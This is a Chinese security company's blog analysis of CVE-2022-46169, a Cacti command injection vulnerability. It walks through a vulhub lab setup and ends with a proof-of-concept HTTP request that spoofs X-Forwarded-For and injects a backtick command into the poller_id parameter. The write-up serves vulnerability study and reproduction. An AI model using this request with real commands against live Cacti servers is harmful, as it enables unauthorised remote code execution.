CVE-2022-46169 Cacti前台命令注入漏洞简析





首页 产品与服务 解决方案 客户案例 技术支持 合作发展 关于美创 用户退出 合作商登录 用户登录 申请试用

行业解决方案政府解决方案金融解决方案医疗解决方案教育解决方案能源解决方案物流交通解决方案

售后服务文档中心年度培训

渠道政策申请成为合作伙伴渠道专区

公司动态行业资讯安全研究

热门阅读

《金融信息服务数据分类分级指南》解读与美创数据安全分类分级落地实践

2026-06-23

国家网信办、工业和信息化部、公安部联合公布《网络数据安全风险评估办法》

2026-06-22

AI 驱动后渗透综合管理平台LeoAI部署与使用

2026-06-18

美创科技端午节假期值班公告

2026-06-18

以智筑盾｜美创科技多维入选《2026 AI+网络安全产业图谱》

2026-06-16

AI 驱动后渗透综合管理平台LeoAI部署与使用

2026-06-18

开源AI自主渗透智能体LuaN1aoAgent部署与使用

2026-06-15

开源AI原生安全测试平台CyberStrikeAI部署与使用

2026-06-08

开源AI渗透测试工具Cairn AI部署与使用

2026-05-29

从0到1：构建一个AI自动化未授权访问漏洞挖掘 Agent

2026-05-25

CVE-2022-46169 Cacti前台命令注入漏洞简析

发布时间：2023-01-13 阅读次数： 1155 次

漏洞概述

Cacti项目是一个开源平台，可为用户提供强大且可扩展的操作监控和故障管理框架。在其1.2.17-1.2.22版本中存在一处命令注入漏洞，攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令。漏洞编号：CVE-2022-46169，漏洞等级：严重。

环境搭建

本次使用vulhub搭建本地测试环境进行复现：

执行以下命令，将vulhub环境拉取到本地。

git clone https://github.com/vulhub/vulhub

执行以下命令，启动一个Cacti 1.2.22版本服务器。

cd vulhub-ｍａｓｔｅｒ/cacti/CVE-2022-46169docker-compose up -d

执行docker ps命令查看容器运行状况

环境启动后，访问http://your-ip:8080会跳转到登录页面，使用admin/admin作为账号密码登录，并根据页面中的提示进行初始化，不断点击“下一步”，直到安装成功：

这个漏洞的利用需要Cacti应用中至少存在一个类似是POLLER_ACTION_SCRIPT_PHP的采集器。所以，我们在Cacti后台首页创建一个新的Graph：

选择的Graph Type是“Device - Uptime”，点击创建：

漏洞复现

利用POC发送如下数据包：

GET /remote_agent.php?action=polldata&local_data_ids[0]=6&host_id=1&poller_id=`touch+/tmp/success` HTTP/1.1X-Forwarded-For: 127.0.0.1Host: localhost.lanUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1